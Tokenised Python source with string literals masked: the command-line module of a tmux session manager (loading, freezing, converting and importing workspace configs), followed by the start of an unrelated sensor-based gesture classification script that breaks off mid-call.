'<STR_LIT>' <EOL> while True : <EOL> rv = input ( prompt ) <EOL> if not rv : <EOL> return default <EOL> if rv . lower ( ) in yes_choices : <EOL> return True <EOL> elif rv . 
lower ( ) in no_choices : <EOL> return False <EOL> def prompt_yes_no ( name , default = True ) : <EOL> """<STR_LIT>""" <EOL> return prompt_bool ( name , default = default ) <EOL> def prompt_choices ( name , choices , default = None , no_choice = ( '<STR_LIT:none>' , ) ) : <EOL> """<STR_LIT>""" <EOL> _choices = [ ] <EOL> options = [ ] <EOL> for choice in choices : <EOL> if isinstance ( choice , string_types ) : <EOL> options . append ( choice ) <EOL> else : <EOL> options . append ( "<STR_LIT>" % ( choice , choice [ <NUM_LIT:0> ] ) ) <EOL> choice = choice [ <NUM_LIT:0> ] <EOL> _choices . append ( choice ) <EOL> while True : <EOL> rv = prompt ( name + '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( options ) , default ) <EOL> if not rv : <EOL> return default <EOL> rv = rv . lower ( ) <EOL> if rv in no_choice : <EOL> return None <EOL> if rv in _choices : <EOL> return rv <EOL> class ConfigFileCompleter ( argcomplete . completers . FilesCompleter ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , prefix , ** kwargs ) : <EOL> completion = argcomplete . completers . FilesCompleter . __call__ ( <EOL> self , prefix , ** kwargs <EOL> ) <EOL> completion += [ os . path . join ( config_dir , c ) <EOL> for c in config . in_dir ( config_dir ) ] <EOL> return completion <EOL> class TmuxinatorCompleter ( argcomplete . completers . FilesCompleter ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , prefix , ** kwargs ) : <EOL> completion = argcomplete . completers . FilesCompleter . __call__ ( <EOL> self , prefix , ** kwargs <EOL> ) <EOL> tmuxinator_configs = config . in_dir ( <EOL> tmuxinator_config_dir , extensions = '<STR_LIT>' <EOL> ) <EOL> completion += [ <EOL> os . path . join ( tmuxinator_config_dir , f ) <EOL> for f in tmuxinator_configs <EOL> ] <EOL> return completion <EOL> class TeamocilCompleter ( argcomplete . completers . FilesCompleter ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , prefix , ** kwargs ) : <EOL> completion = argcomplete . completers . 
FilesCompleter . __call__ ( <EOL> self , prefix , ** kwargs <EOL> ) <EOL> teamocil_configs = config . in_dir ( teamocil_config_dir , extensions = '<STR_LIT>' ) <EOL> completion += [ <EOL> os . path . join ( teamocil_config_dir , f ) <EOL> for f in teamocil_configs <EOL> ] <EOL> return completion <EOL> def SessionCompleter ( prefix , parsed_args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> t = Server ( <EOL> socket_name = parsed_args . socket_name , <EOL> socket_path = parsed_args . socket_path <EOL> ) <EOL> sessions_available = [ <EOL> s . get ( '<STR_LIT>' ) for s in t . _sessions <EOL> if s . get ( '<STR_LIT>' ) . startswith ( '<STR_LIT:U+0020>' . join ( prefix ) ) <EOL> ] <EOL> if parsed_args . session_name and sessions_available : <EOL> return [ ] <EOL> return [ <EOL> s . get ( '<STR_LIT>' ) for s in t . _sessions <EOL> if s . get ( '<STR_LIT>' ) . startswith ( prefix ) <EOL> ] <EOL> def setup_logger ( logger = None , level = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if not logger : <EOL> logger = logging . getLogger ( ) <EOL> if not logger . handlers : <EOL> channel = logging . StreamHandler ( ) <EOL> channel . setFormatter ( log . DebugLogFormatter ( ) ) <EOL> logger . setLevel ( level ) <EOL> logger . addHandler ( channel ) <EOL> def startup ( config_dir ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( config_dir ) : <EOL> os . makedirs ( config_dir ) <EOL> def load_workspace ( config_file , args ) : <EOL> """<STR_LIT>""" <EOL> sconfig = kaptan . Kaptan ( ) <EOL> sconfig = sconfig . import_config ( config_file ) . get ( ) <EOL> sconfig = config . expand ( sconfig , os . path . dirname ( config_file ) ) <EOL> sconfig = config . trickle ( sconfig ) <EOL> t = Server ( <EOL> socket_name = args . socket_name , <EOL> socket_path = args . socket_path , <EOL> colors = args . colors <EOL> ) <EOL> try : <EOL> builder = WorkspaceBuilder ( sconf = sconfig , server = t ) <EOL> except exc . EmptyConfigException : <EOL> logger . 
error ( '<STR_LIT>' % config_file ) <EOL> return <EOL> tmux_bin = util . which ( '<STR_LIT>' ) <EOL> try : <EOL> logger . info ( '<STR_LIT>' % config_file ) <EOL> builder . build ( ) <EOL> if '<STR_LIT>' in os . environ : <EOL> if not args . detached and ( args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' <EOL> ) ) : <EOL> tmux_env = os . environ . pop ( '<STR_LIT>' ) <EOL> builder . session . switch_client ( ) <EOL> os . environ [ '<STR_LIT>' ] = tmux_env <EOL> return <EOL> else : <EOL> sys . exit ( '<STR_LIT>' ) <EOL> if not args . detached : <EOL> builder . session . attach_session ( ) <EOL> except exc . TmuxSessionExists as e : <EOL> if not args . detached and ( <EOL> args . answer_yes or prompt_yes_no ( '<STR_LIT>' % e ) <EOL> ) : <EOL> if '<STR_LIT>' in os . environ : <EOL> builder . session . switch_client ( ) <EOL> else : <EOL> builder . session . attach_session ( ) <EOL> return <EOL> except exc . TmuxpException as e : <EOL> import traceback <EOL> print ( traceback . format_exc ( ) ) <EOL> logger . error ( e ) <EOL> choice = prompt_choices ( <EOL> '<STR_LIT>' , <EOL> choices = [ '<STR_LIT:k>' , '<STR_LIT:a>' , '<STR_LIT:d>' ] , <EOL> default = '<STR_LIT:k>' <EOL> ) <EOL> if choice == '<STR_LIT:k>' : <EOL> builder . session . kill_session ( ) <EOL> print ( '<STR_LIT>' ) <EOL> elif choice == '<STR_LIT:a>' : <EOL> if '<STR_LIT>' in os . environ : <EOL> builder . session . switch_client ( ) <EOL> else : <EOL> builder . session . attach_session ( ) <EOL> else : <EOL> sys . exit ( ) <EOL> def command_freeze ( args ) : <EOL> """<STR_LIT>""" <EOL> ctext = '<STR_LIT:U+0020>' . join ( args . session_name ) <EOL> t = Server ( <EOL> socket_name = args . socket_name , <EOL> socket_path = args . socket_path , <EOL> colors = args . colors <EOL> ) <EOL> try : <EOL> session = t . findWhere ( { <EOL> '<STR_LIT>' : ctext <EOL> } ) <EOL> if not session : <EOL> raise exc . TmuxpException ( '<STR_LIT>' ) <EOL> except exc . 
TmuxpException as e : <EOL> print ( e ) <EOL> return <EOL> sconf = freeze ( session ) <EOL> configparser = kaptan . Kaptan ( ) <EOL> newconfig = config . inline ( sconf ) <EOL> configparser . import_config ( newconfig ) <EOL> config_format = prompt_choices ( '<STR_LIT>' , choices = [ <EOL> '<STR_LIT>' , '<STR_LIT>' ] , default = '<STR_LIT>' ) <EOL> if config_format == '<STR_LIT>' : <EOL> newconfig = configparser . export ( <EOL> '<STR_LIT>' , indent = <NUM_LIT:2> , default_flow_style = False , safe = True <EOL> ) <EOL> elif config_format == '<STR_LIT>' : <EOL> newconfig = configparser . export ( '<STR_LIT>' , indent = <NUM_LIT:2> ) <EOL> else : <EOL> sys . exit ( '<STR_LIT>' ) <EOL> print ( newconfig ) <EOL> print ( <EOL> '<STR_LIT>' ) <EOL> print ( <EOL> '<STR_LIT>' ) <EOL> if args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' <EOL> ) : <EOL> dest = None <EOL> while not dest : <EOL> save_to = os . path . abspath ( <EOL> os . path . join ( <EOL> config_dir , <EOL> '<STR_LIT>' % ( sconf . get ( '<STR_LIT>' ) , config_format ) <EOL> ) <EOL> ) <EOL> dest_prompt = prompt ( '<STR_LIT>' , save_to ) <EOL> if os . path . exists ( dest_prompt ) : <EOL> print ( '<STR_LIT>' % dest_prompt ) <EOL> continue <EOL> dest = dest_prompt <EOL> dest = os . path . abspath ( os . path . relpath ( os . path . expanduser ( dest ) ) ) <EOL> if args . answer_yes or prompt_yes_no ( '<STR_LIT>' % dest ) : <EOL> destdir = os . path . dirname ( dest ) <EOL> if not os . path . isdir ( destdir ) : <EOL> os . makedirs ( destdir ) <EOL> buf = open ( dest , '<STR_LIT:w>' ) <EOL> buf . write ( newconfig ) <EOL> buf . close ( ) <EOL> print ( '<STR_LIT>' % dest ) <EOL> else : <EOL> print ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> sys . exit ( ) <EOL> def command_load ( args ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( args . config , list ) : <EOL> for cfg in args . config [ : - <NUM_LIT:1> ] : <EOL> new_args = argparse . Namespace ( ** args . 
__dict__ ) <EOL> new_args . detached = True <EOL> new_args . config = cfg <EOL> command_load ( new_args ) <EOL> new_args = argparse . Namespace ( ** args . __dict__ ) <EOL> new_args . config = args . config [ - <NUM_LIT:1> ] <EOL> command_load ( new_args ) <EOL> return <EOL> if '<STR_LIT:.>' == args . config : <EOL> if config . in_cwd ( ) : <EOL> configfile = config . in_cwd ( ) [ <NUM_LIT:0> ] <EOL> else : <EOL> sys . exit ( '<STR_LIT>' ) <EOL> else : <EOL> configfile = args . config <EOL> file_user = os . path . join ( config_dir , configfile ) <EOL> file_cwd = os . path . join ( cwd_dir , configfile ) <EOL> if os . path . exists ( file_cwd ) and os . path . isfile ( file_cwd ) : <EOL> print ( '<STR_LIT>' % file_cwd ) <EOL> load_workspace ( file_cwd , args ) <EOL> elif os . path . exists ( file_user ) and os . path . isfile ( file_user ) : <EOL> load_workspace ( file_user , args ) <EOL> else : <EOL> logger . error ( '<STR_LIT>' % configfile ) <EOL> def command_import_teamocil ( args ) : <EOL> """<STR_LIT>""" <EOL> if args . list : <EOL> try : <EOL> configs_in_user = config . in_dir ( <EOL> teamocil_config_dir , extensions = '<STR_LIT>' ) <EOL> except OSError : <EOL> configs_in_user = [ ] <EOL> configs_in_cwd = config . in_dir ( <EOL> config_dir = cwd_dir , extensions = '<STR_LIT>' ) <EOL> output = '<STR_LIT>' <EOL> if not os . path . exists ( teamocil_config_dir ) : <EOL> output += '<STR_LIT>' % teamocil_config_dir <EOL> elif not configs_in_user : <EOL> output += '<STR_LIT>' % teamocil_config_dir <EOL> else : <EOL> output += '<STR_LIT>' % ( <EOL> config_dir , '<STR_LIT:U+002CU+0020>' . join ( configs_in_user ) <EOL> ) <EOL> if configs_in_cwd : <EOL> output += '<STR_LIT>' % ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( configs_in_cwd ) <EOL> ) <EOL> print ( output ) <EOL> elif args . config : <EOL> configfile = os . path . abspath ( os . path . relpath ( <EOL> os . path . expanduser ( args . config ) ) ) <EOL> configparser = kaptan . 
Kaptan ( handler = '<STR_LIT>' ) <EOL> if os . path . exists ( configfile ) : <EOL> print ( configfile ) <EOL> configparser . import_config ( configfile ) <EOL> newconfig = config . import_teamocil ( configparser . get ( ) ) <EOL> configparser . import_config ( newconfig ) <EOL> else : <EOL> sys . exit ( '<STR_LIT>' % configfile ) <EOL> config_format = prompt_choices ( '<STR_LIT>' , choices = [ <EOL> '<STR_LIT>' , '<STR_LIT>' ] , default = '<STR_LIT>' ) <EOL> if config_format == '<STR_LIT>' : <EOL> newconfig = configparser . export ( <EOL> '<STR_LIT>' , indent = <NUM_LIT:2> , default_flow_style = False <EOL> ) <EOL> elif config_format == '<STR_LIT>' : <EOL> newconfig = configparser . export ( '<STR_LIT>' , indent = <NUM_LIT:2> ) <EOL> else : <EOL> sys . exit ( '<STR_LIT>' ) <EOL> print ( newconfig ) <EOL> print ( <EOL> '<STR_LIT>' ) <EOL> print ( <EOL> '<STR_LIT>' ) <EOL> if args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' <EOL> ) : <EOL> dest = None <EOL> while not dest : <EOL> dest_prompt = prompt ( '<STR_LIT>' , os . path . abspath ( <EOL> os . path . join ( config_dir , '<STR_LIT>' % config_format ) ) ) <EOL> if os . path . exists ( dest_prompt ) : <EOL> print ( '<STR_LIT>' % dest_prompt ) <EOL> continue <EOL> dest = dest_prompt <EOL> dest = os . path . abspath ( os . path . relpath ( os . path . expanduser ( dest ) ) ) <EOL> if args . answer_yes or prompt_yes_no ( '<STR_LIT>' % dest ) : <EOL> buf = open ( dest , '<STR_LIT:w>' ) <EOL> buf . write ( newconfig ) <EOL> buf . close ( ) <EOL> print ( '<STR_LIT>' % dest ) <EOL> else : <EOL> print ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> sys . exit ( ) <EOL> def command_import_tmuxinator ( args ) : <EOL> """<STR_LIT>""" <EOL> if args . list : <EOL> try : <EOL> configs_in_user = config . in_dir ( <EOL> tmuxinator_config_dir , extensions = '<STR_LIT>' ) <EOL> except OSError : <EOL> configs_in_user = [ ] <EOL> configs_in_cwd = config . 
in_dir ( <EOL> config_dir = cwd_dir , extensions = '<STR_LIT>' ) <EOL> output = '<STR_LIT>' <EOL> if not os . path . exists ( tmuxinator_config_dir ) : <EOL> output += '<STR_LIT>' % tmuxinator_config_dir <EOL> elif not configs_in_user : <EOL> output += '<STR_LIT>' % tmuxinator_config_dir <EOL> else : <EOL> output += '<STR_LIT>' % ( <EOL> config_dir , '<STR_LIT:U+002CU+0020>' . join ( configs_in_user ) <EOL> ) <EOL> if configs_in_cwd : <EOL> output += '<STR_LIT>' % ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( configs_in_cwd ) <EOL> ) <EOL> print ( output ) <EOL> if args . config : <EOL> configfile = os . path . abspath ( os . path . relpath ( <EOL> os . path . expanduser ( args . config ) ) ) <EOL> configparser = kaptan . Kaptan ( handler = '<STR_LIT>' ) <EOL> if os . path . exists ( configfile ) : <EOL> print ( configfile ) <EOL> configparser . import_config ( configfile ) <EOL> newconfig = config . import_tmuxinator ( configparser . get ( ) ) <EOL> configparser . import_config ( newconfig ) <EOL> else : <EOL> sys . exit ( '<STR_LIT>' % configfile ) <EOL> config_format = prompt_choices ( '<STR_LIT>' , choices = [ <EOL> '<STR_LIT>' , '<STR_LIT>' ] , default = '<STR_LIT>' ) <EOL> if config_format == '<STR_LIT>' : <EOL> newconfig = configparser . export ( <EOL> '<STR_LIT>' , indent = <NUM_LIT:2> , default_flow_style = False <EOL> ) <EOL> elif config_format == '<STR_LIT>' : <EOL> newconfig = configparser . export ( '<STR_LIT>' , indent = <NUM_LIT:2> ) <EOL> else : <EOL> sys . exit ( '<STR_LIT>' ) <EOL> print ( newconfig ) <EOL> print ( <EOL> '<STR_LIT>' ) <EOL> print ( <EOL> '<STR_LIT>' ) <EOL> if args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' <EOL> ) : <EOL> dest = None <EOL> while not dest : <EOL> dest_prompt = prompt ( '<STR_LIT>' , os . path . abspath ( <EOL> os . path . join ( config_dir , '<STR_LIT>' % config_format ) ) ) <EOL> if os . path . 
exists ( dest_prompt ) : <EOL> print ( '<STR_LIT>' % dest_prompt ) <EOL> continue <EOL> dest = dest_prompt <EOL> dest = os . path . abspath ( os . path . relpath ( os . path . expanduser ( dest ) ) ) <EOL> if args . answer_yes or prompt_yes_no ( '<STR_LIT>' % dest ) : <EOL> buf = open ( dest , '<STR_LIT:w>' ) <EOL> buf . write ( newconfig ) <EOL> buf . close ( ) <EOL> print ( '<STR_LIT>' % dest ) <EOL> else : <EOL> print ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> sys . exit ( ) <EOL> def command_convert ( args ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> configfile = args . config <EOL> except exc . TmuxpException : <EOL> print ( '<STR_LIT>' ) <EOL> file_user = os . path . join ( config_dir , configfile ) <EOL> file_cwd = os . path . join ( cwd_dir , configfile ) <EOL> if os . path . exists ( file_cwd ) and os . path . isfile ( file_cwd ) : <EOL> fullfile = os . path . normpath ( file_cwd ) <EOL> filename , ext = os . path . splitext ( file_cwd ) <EOL> elif os . path . exists ( file_user ) and os . path . isfile ( file_user ) : <EOL> fullfile = os . path . normpath ( file_user ) <EOL> filename , ext = os . path . splitext ( file_user ) <EOL> else : <EOL> logger . error ( '<STR_LIT>' % configfile ) <EOL> return <EOL> if '<STR_LIT>' in ext : <EOL> if args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' % ( fullfile ) <EOL> ) : <EOL> configparser = kaptan . Kaptan ( ) <EOL> configparser . import_config ( configfile ) <EOL> newfile = fullfile . replace ( ext , '<STR_LIT>' ) <EOL> newconfig = configparser . export ( <EOL> '<STR_LIT>' , indent = <NUM_LIT:2> , default_flow_style = False <EOL> ) <EOL> if args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' % ( newfile ) <EOL> ) : <EOL> buf = open ( newfile , '<STR_LIT:w>' ) <EOL> buf . write ( newconfig ) <EOL> buf . close ( ) <EOL> print ( '<STR_LIT>' % ( newfile ) ) <EOL> elif '<STR_LIT>' in ext : <EOL> if args . 
answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' % ( fullfile ) <EOL> ) : <EOL> configparser = kaptan . Kaptan ( ) <EOL> configparser . import_config ( configfile ) <EOL> newfile = fullfile . replace ( ext , '<STR_LIT>' ) <EOL> newconfig = configparser . export ( '<STR_LIT>' , indent = <NUM_LIT:2> ) <EOL> print ( newconfig ) <EOL> if args . answer_yes or prompt_yes_no ( <EOL> '<STR_LIT>' % ( newfile ) <EOL> ) : <EOL> buf = open ( newfile , '<STR_LIT:w>' ) <EOL> buf . write ( newconfig ) <EOL> buf . close ( ) <EOL> print ( '<STR_LIT>' % ( newfile ) ) <EOL> def command_attach_session ( args ) : <EOL> """<STR_LIT>""" <EOL> commands = [ ] <EOL> ctext = '<STR_LIT:U+0020>' . join ( args . session_name ) <EOL> t = Server ( <EOL> socket_name = args . socket_name , <EOL> socket_path = args . socket_path , <EOL> colors = args . colors <EOL> ) <EOL> try : <EOL> session = next ( ( s for s in t . sessions if s . get ( <EOL> '<STR_LIT>' ) == ctext ) , None ) <EOL> if not session : <EOL> raise exc . TmuxpException ( '<STR_LIT>' ) <EOL> except exc . TmuxpException as e : <EOL> print ( e ) <EOL> return <EOL> if '<STR_LIT>' in os . environ : <EOL> del os . environ [ '<STR_LIT>' ] <EOL> session . switch_client ( ) <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> session . attach_session ( ) <EOL> print ( '<STR_LIT>' ) <EOL> def command_kill_session ( args ) : <EOL> """<STR_LIT>""" <EOL> commands = [ ] <EOL> ctext = '<STR_LIT:U+0020>' . join ( args . session_name ) <EOL> t = Server ( <EOL> socket_name = args . socket_name or None , <EOL> socket_path = args . socket_path or None <EOL> ) <EOL> try : <EOL> session = next ( ( s for s in t . sessions if s . get ( <EOL> '<STR_LIT>' ) == ctext ) , None ) <EOL> if not session : <EOL> raise exc . TmuxpException ( '<STR_LIT>' ) <EOL> except exc . TmuxpException as e : <EOL> print ( e ) <EOL> return <EOL> try : <EOL> session . kill_session ( ) <EOL> print ( "<STR_LIT>" % ctext ) <EOL> except exc . TmuxpException as e : <EOL> logger . 
error ( e ) <EOL> def get_parser ( ) : <EOL> """<STR_LIT>""" <EOL> server_parser = argparse . ArgumentParser ( add_help = False ) <EOL> server_parser . add_argument ( <EOL> '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> default = None , <EOL> help = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' <EOL> ) <EOL> server_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> default = None , <EOL> help = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' <EOL> ) <EOL> server_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> default = None , <EOL> help = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' <EOL> ) <EOL> parser = argparse . ArgumentParser ( <EOL> description = '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> parents = [ server_parser ] <EOL> ) <EOL> client_parser = argparse . ArgumentParser ( add_help = False ) <EOL> colorsgroup = client_parser . add_mutually_exclusive_group ( ) <EOL> colorsgroup . add_argument ( <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> const = <NUM_LIT> , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> colorsgroup . add_argument ( <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> const = <NUM_LIT> , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> parser . set_defaults ( colors = None ) <EOL> subparsers = parser . add_subparsers ( <EOL> title = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> ) <EOL> kill_session = subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> parents = [ server_parser ] , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> kill_session . set_defaults ( callback = command_kill_session ) <EOL> kill_session . add_argument ( <EOL> dest = '<STR_LIT>' , <EOL> type = str , <EOL> nargs = '<STR_LIT:+>' , <EOL> default = None , <EOL> help = '<STR_LIT>' , <EOL> ) . completer = SessionCompleter <EOL> attach_session = subparsers . 
add_parser ( <EOL> '<STR_LIT>' , <EOL> parents = [ server_parser , client_parser ] , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> attach_session . set_defaults ( callback = command_attach_session ) <EOL> attach_session . add_argument ( <EOL> dest = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> type = str , <EOL> help = '<STR_LIT>' , <EOL> ) . completer = SessionCompleter <EOL> freeze = subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> parents = [ server_parser ] , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> freeze . set_defaults ( callback = command_freeze ) <EOL> freeze . add_argument ( <EOL> dest = '<STR_LIT>' , <EOL> type = str , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' , <EOL> ) . completer = SessionCompleter <EOL> load = subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> parents = [ server_parser , client_parser ] , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> load . add_argument ( <EOL> dest = '<STR_LIT>' , <EOL> type = str , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' <EOL> ) . completer = ConfigFileCompleter ( <EOL> allowednames = ( '<STR_LIT>' , '<STR_LIT>' ) , directories = False <EOL> ) <EOL> load . set_defaults ( callback = command_load ) <EOL> load . add_argument ( <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> default = None , <EOL> help = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' <EOL> ) <EOL> convert = subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> convert . add_argument ( <EOL> dest = '<STR_LIT>' , <EOL> type = str , <EOL> default = None , <EOL> help = '<STR_LIT>' <EOL> ) . completer = ConfigFileCompleter ( <EOL> allowednames = ( '<STR_LIT>' , '<STR_LIT>' ) , directories = False <EOL> ) <EOL> convert . set_defaults ( callback = command_convert ) <EOL> importparser = subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> importsubparser = importparser . 
add_subparsers ( <EOL> title = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> import_teamocil = importsubparser . add_parser ( <EOL> '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> ) <EOL> import_teamocilgroup = import_teamocil . add_mutually_exclusive_group ( <EOL> required = True <EOL> ) <EOL> import_teamocilgroup . add_argument ( <EOL> '<STR_LIT>' , dest = '<STR_LIT:list>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> import_teamocilgroup . add_argument ( <EOL> dest = '<STR_LIT>' , <EOL> type = str , <EOL> nargs = '<STR_LIT:?>' , <EOL> help = '''<STR_LIT>''' <EOL> ) . completer = TeamocilCompleter ( allowednames = ( '<STR_LIT>' ) , directories = False ) <EOL> import_teamocil . set_defaults ( callback = command_import_teamocil ) <EOL> import_tmuxinator = importsubparser . add_parser ( <EOL> '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> ) <EOL> import_tmuxinatorgroup = import_tmuxinator . add_mutually_exclusive_group ( <EOL> required = True ) <EOL> import_tmuxinatorgroup . add_argument ( <EOL> '<STR_LIT>' , dest = '<STR_LIT:list>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> import_tmuxinatorgroup . add_argument ( <EOL> dest = '<STR_LIT>' , <EOL> type = str , <EOL> nargs = '<STR_LIT:?>' , <EOL> help = '''<STR_LIT>''' <EOL> ) . completer = TmuxinatorCompleter ( allowednames = ( '<STR_LIT>' ) , directories = False ) <EOL> import_tmuxinator . set_defaults ( callback = command_import_tmuxinator ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> default = None , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:version>' , <EOL> version = '<STR_LIT>' % __version__ , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> return parser <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> parser = get_parser ( ) <EOL> argcomplete . 
autocomplete ( parser , always_complete_options = False ) <EOL> args = parser . parse_args ( ) <EOL> log_level = '<STR_LIT>' <EOL> if '<STR_LIT>' in args and isinstance ( args . log_level , string_types ) : <EOL> log_level = args . log_level . upper ( ) <EOL> setup_logger ( <EOL> level = log_level <EOL> ) <EOL> try : <EOL> util . has_required_tmux_version ( ) <EOL> except exc . TmuxpException as e : <EOL> logger . error ( e ) <EOL> sys . exit ( ) <EOL> util . oh_my_zsh_auto_title ( ) <EOL> t = Server ( <EOL> socket_name = args . socket_name , <EOL> socket_path = args . socket_path , <EOL> colors = args . colors <EOL> ) <EOL> try : <EOL> if not hasattr ( args , '<STR_LIT>' ) : <EOL> parser . print_help ( ) <EOL> elif args . callback is command_load : <EOL> command_load ( args ) <EOL> elif args . callback is command_convert : <EOL> command_convert ( args ) <EOL> elif args . callback is command_import_teamocil : <EOL> command_import_teamocil ( args ) <EOL> elif args . callback is command_import_tmuxinator : <EOL> command_import_tmuxinator ( args ) <EOL> elif args . callback is command_freeze : <EOL> command_freeze ( args ) <EOL> elif args . callback is command_attach_session : <EOL> command_attach_session ( args ) <EOL> elif args . callback is command_kill_session : <EOL> command_kill_session ( args ) <EOL> except KeyboardInterrupt : <EOL> pass </s>
<s> __author__ = '<STR_LIT>' <EOL> import sys <EOL> from modules . sensor . Gyroscope import * <EOL> from modules . sensor . Accelerometer import * <EOL> from modules . label . Label import * <EOL> from modules . feature . FeatureExtractor import * <EOL> from modules . classification . Recurrent import * <EOL> class Main : <EOL> def __init__ ( self , run_name = "<STR_LIT>" , use_statistical_features = False , preprocess_signal = True , use_heuristic_segmentation = False ) : <EOL> self . run_name = "<STR_LIT:_>" + run_name <EOL> self . view = View ( False , False , "<STR_LIT>" ) <EOL> self . use_statistical_features = use_statistical_features <EOL> self . preprocess_signal = preprocess_signal <EOL> self . use_heuristic_segmentation = use_heuristic_segmentation <EOL> def process_all ( self , sensors = "<STR_LIT>" , merge_axes = { "<STR_LIT:g>" : False , "<STR_LIT:a>" : False } ) : <EOL> for entry in os . listdir ( Path . RAW_PATH ) : <EOL> if entry . find ( "<STR_LIT>" ) != - <NUM_LIT:1> : <EOL> session_id = entry [ : entry . find ( "<STR_LIT:_>" ) ] <EOL> self . process ( session_id , sensors , merge_axes ) <EOL> def process ( self , session_id , sensors = "<STR_LIT>" , merge_axes = { "<STR_LIT:g>" : False , "<STR_LIT:a>" : False } ) : <EOL> data_path = Path . get_path ( Path . RAW_PATH , session_id ) + "<STR_LIT:_>" <EOL> output_path = Path . get_path ( Path . FEATURE_PATH , session_id ) <EOL> label = Label ( data_path ) <EOL> gyroscope = Gyroscope ( data_path , self . view , merge_axes [ "<STR_LIT:g>" ] , preprocess_signal = self . preprocess_signal ) <EOL> accelerometer = Accelerometer ( data_path , self . view , merge_axes [ "<STR_LIT:a>" ] , preprocess_signal = self . preprocess_signal ) <EOL> accelerometer . fit ( gyroscope . timestamp ) <EOL> feature_extractor = FeatureExtractor ( output_path , self . view , use_statistical_features = self . 
use_statistical_features ) <EOL> fusion = [ ] <EOL> for sensor in sensors : <EOL> if sensor == '<STR_LIT:g>' : <EOL> fusion . append ( gyroscope ) <EOL> if sensor == '<STR_LIT:a>' : <EOL> fusion . append ( accelerometer ) <EOL> if not self . use_heuristic_segmentation : <EOL> if label . has_label : <EOL> feature_extractor . segment_from_labels ( fusion , label ) <EOL> else : <EOL> feature_extractor . segment_heuristically ( fusion , gyroscope . get_mean_signal ( ) ) <EOL> else : <EOL> feature_extractor . segment_heuristically ( fusion , gyroscope . get_mean_signal ( ) , label ) <EOL> def get_classifier ( self , neurons_per_layer ) : <EOL> classifier = Recurrent ( neurons_per_layer ) <EOL> classifier . retrieve_samples ( Path . FEATURE_PATH ) <EOL> return classifier <EOL> def train ( self , iteration = <NUM_LIT:100> , neurons_per_layer = [ <NUM_LIT> , <NUM_LIT> ] ) : <EOL> classifier = self . get_classifier ( neurons_per_layer ) <EOL> classifier . train_model ( iteration ) <EOL> classifier . relevance . output_mean_square_mean_error ( "<STR_LIT>" . format ( Path . RESULT_PATH , self . run_name ) ) <EOL> def evaluate ( self ) : <EOL> classifier = Recurrent ( ) <EOL> classifier . retrieve_samples ( Path . FEATURE_PATH ) <EOL> classifier . evaluate ( ) <EOL> classifier . relevance . output_confusion_matrix ( 